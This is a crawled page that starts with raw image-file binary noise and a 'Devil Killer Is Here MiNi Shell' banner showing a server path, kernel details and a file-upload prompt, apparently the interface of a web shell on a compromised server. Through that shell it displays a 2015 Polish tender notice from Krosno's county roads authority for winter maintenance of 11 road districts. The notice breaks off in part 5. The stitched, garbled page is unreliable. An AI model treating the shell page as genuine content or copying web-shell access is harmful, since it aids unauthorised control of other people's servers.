JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151013/271174-N-2015.html

<p class="kh_header"><b>Krosno: Usługi związane z zimowym utrzymaniem dróg powiatowych w sezonie zimowym 2015/2016
Zamówienie podzielono na części. Liczba części 11</b><br>
<b>Numer ogłoszenia: 271174 - 2015; data zamieszczenia: 13.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Krośnie , ul. Bieszczadzka 1, 38-400 Krosno, woj. podkarpackie, tel. 13 437 57 96, faks 13 436 60 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdkrosno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi związane z zimowym utrzymaniem dróg powiatowych w sezonie zimowym 2015/2016
Zamówienie podzielono na części. Liczba części 11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza składanie ofert częściowych - liczba części 11

Część 1: Rejon Dukla/Miejsce Piastowe
Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 1) -  312godz.

Część 2: Rejon Chorkówka/Dukla
Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 2) -  348godz.

Część 3: Rejon Chorkówka
Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 3) -  278godz.


Część 4: Rejon Miejsce Piastowe
Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 4) -  292godz.


Część 5: Rejon Iwonicz
Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 5) -  260godz.


Część 6: Rejon Dukla
Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 6) -  473godz.


Część 7: Rejon Jedlicze
Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 7) -  208godz.


Część 8: Rejon Wojaszówka
Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 8) -  372godz.


Część 9: Rejon Jaśliska
Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 9) -  247godz.


Część 10: Rejon Rymanów
Szacunkowa ilość godzin pracy sprzetu w sezonie zimowym 2015/2016 (dotyczy części 10) -  179godz.


Część 11: Rejon Puławy
Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 11) -  202godz..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na etapie składania ofert, Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedłoży WYKAZ wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług (co najmniej dwóch), w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów (poświadczeń), czy zostały wykonane lub są wykonywane należycie - wg wzoru stanowiącego Załącznik Nr 5 do SIWZ,  

W przypadku, gdy Zamawiający jest podmiotem na rzecz, którego usługi wskazane w w/w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów (poświadczeń), o których mowa wyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedłoży wypełniony druk Wykaz narzędzi (sprzętu) niezbędnych Wykonawcy do wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami - załącznik nr 7 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponowania tymi osobami - załącznik nr 8 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na etapie składania ofert, Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 

Przed podpisaniem umowy Wykonawca, którego oferta okaże się najkorzystniejsza na daną część zamówienia,  zobowiązany jest przedłożyć Zamawiającemu aktualną polisę, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych  -  wg wzoru stanowiącego Załącznik Nr 2 do SIWZ

2. Wypełniony formularz OFERTY - stanowiący Załącznik Nr1 do SIWZ

3. Parafowany projekt umowy - stanowiący Załącznik nr 4 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa może być wypowiedziana przez strony za 30-dniowym okresem wypowiedzenia.

2. Zamawiający może odstąpić od umowy z przyczyn objętych w art. 145 ustawy Prawo zamówień publicznych.

3.  Zamawiającemu przysługuje prawo do odstąpienia od umowy w trybie natychmiastowym w przypadku, gdy:
a) Wykonawca nie rozpoczął realizacji zamówienia, w ciągu 1godz. od momentu wezwania Go przez Dyżurnego,
b) Wykonawca realizuje usługi objęte umową, niezgodnie z zapisami w niej zawartymi.
c) Wykonawca, co najmniej dwa razy, nienależycie wykonał przedmiot zamówienia.

4. Wykonawca nie może wypowiedzieć umowy w czasie trwania sezonu zimowego. 

5. Strony przewidują możliwość zmiany terminu realizacji umowy ze względu na panujące warunki atmosferyczne.

6. Zamawiający może w przypadku niewykonania umowy przez Wykonawcę, zlecić na koszt i ryzyko Wykonawcy realizację umowy w zakresie niezbędnym do funkcjonowania drogi w okresie zimowym innemu podmiotowi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdkrosno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Krośnie
ul. Bieszczadzka 1, 38 - 400 Krosno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2015 godzina 11:00, miejsce: Powiatowy Zarząd Dróg w Krośnie
38-400 Krosno, ul. Bieszczadzka 1, pok. 613.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1: Rejon Dukla/Miejsce Piastowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje trasy: 
Trasa 1: Dojazd  Zboiska - Łężany (K9), - 8,8 km
Praca Droga Nr 1974R odcinek: Łężany - Krosno (granica)  Łężany
Droga Nr 1974R odcinek: Targowiska - do dr. Nr 2004R 
droga Nr 2004R Stacja Targowiska - Targowiska do dr. K9 do dr. Nr 1974R
droga Nr 1974R odcinek: Targowiska - Wróblik Królewski do dr. 
Nr  2008R  Łężany do K9 
Zjazd  droga K9, Łężany - ODM Dukla 
Długość trasy - 40,0km

Trasa 2: Dojazd /dr. K9 Zboiska - Trzciana 
Praca droga Nr 1998R Trzciana - Zawadka Rymanowska Trzciana do dr.K9
Dojazd  dr. K9 - Tylawa 
droga Nr 1997R Tylawa - Zyndranowa Tylawa do dr. K9
Zjazd  dr. K9 - Dukla ODM
Długość trasy - 40,0km 

Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 1) -  312godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2: Rejon Chorkówka/Dukla.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa 1: Droga Nr 1956R odcinek: Zboiska - Zręcin - Świerzowa Polska  Zręcin
		  Droga Nr 1850R odcinek: Zręcin - Żeglce do dr. Nr 1953R  Zręcin 
		  Droga Nr 1956R. Zręcin - Zboiska 
Długość trasy - 31,0km
Trasa 2: Dojazd  Zboiska - Wietrzno, 
Praca droga Nr 1992R odcinek: Wietrzno - Kobylany,
droga Nr 1896R odcinek: Kobylany - Sulistrowa  Kobylany 
 droga Nr 1896R odcinek: Kobylany - Chorkówka do dr.1953R,
droga Nr 1953R Chorkówka - Żeglce,
droga Nr 1850R odcinek: Żeglce - Kopytowa - Łubno  Kopytowa - Żeglce -
    Chorkówka - Kobylany - Wietrzno
	Zjazd/Wietrzno - ODM Dukla
 								Długość trasy - 48,0km

Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 2) -  348godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3: Rejon Chorkówka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa 1: Dojazd  Zboiska - Bóbrka
Praca droga Nr 1955R odcinek: Bóbrka od dr. 1956R - Bóbrka do Kościoła 
do dr. Nr 1954R
droga Nr 1954R odcinek: Bóbrka - Chorkówka,
droga Nr 1896R odcinek: Chorkówka - Zręcin do dr. Nr 1956R  do dr.
 Nr.1953R
droga Nr 1953R do dr. Nr 1898R 
droga Nr 1898R Chorkówka - Faliszówka - Poraj  do dr. Nr 1950R
droga Nr 1950R Faliszówka -Kopytowa do dr. Nr 1898R
droga Nr 1898R Faliszówka - Chorkówka do dr. Nr 1953R
droga Nr 1953R do dr. Nr 1896R
droga Nr 1896R do dr. Nr 1954R
droga Nr 1954R Chorkówka - Bóbrka do dr. Nr 1955R
droga Nr 1955R Bóbrka - Bóbrka do dr. Nr 1956R
Zjazd  Bóbrka - Zboiska - ODM Dukla
Długość trasy - 53,0km

Trasa 2: Dojazd  dr. Nr 1956R Zboiska - do dr. Nr 1955R
Praca droga Nr 1955R Niżna Łąka - Bóbrka (naw. bitumiczna) do dr. Nr 1956R 
Dojazd  dr. Nr 1956R do dr. Nr 1957R
Praca Nr 1957R Machnówka przez wieś do dr. 1956R
Zjazd  dr. 1956R - Dukla ODM 
Długość trasy - 26,0km

Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 3) -  278godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4: Rejon Miejsce Piastowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa 1: Dojazd  dr. K9 - Rogi 
Praca droga Nr 1976R odcinek Rogi - Wrocanka do dr. Nr 1975R 
droga Nr 1975R odcinek Wrocanka - do Kościoła do dr. Nr 1976R
droga Nr 1975R odcinek Wrocanka - Miejsce Piastowe do dr. K9  Wrocanka
droga Nr 1976R odcinek Wrocanka - Głowienka - Krosno do dr. K9
Zjazd  droga K9 do ODM Dukla
  								Długość trasy - 38,0km

Trasa 2: Dojazd  dr. K9 - Równe 
Praca droga Nr 2003R Równe - Równe Kopalnia do dr. Nr 1956R do dr. Nr 1975R
 droga Nr 1975R odcinek Równe - Wrocanka do dr. Nr 1976R
Dojazd  droga Nr 1976R Wrocanka - Głowienka do dr. Nr 1959R 
Praca droga Nr 1959R Głowienka - Szczepańcowa
droga Nr 1958R odcinek Szczepańcowa - ujęcie wody do dr. 1959R
droga Nr 1958R Szczepańcowa - Świerzowa Polska  do ODM Dukla
Długość trasy - 49,0km

Szacunkowa ilość godzin pracy sprzętu w sezonie zimowym 2015/2016 (dotyczy części 4) -  292godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. CZAS PODSTAWIENIA, w przypadku awarii, zastępczych pojazdów i sprzętu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5: Rejon Iwonicz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa 1: Dojazd  dr. K9 - Rogi
Praca droga Nr 1976R Rogi - Iwonicz
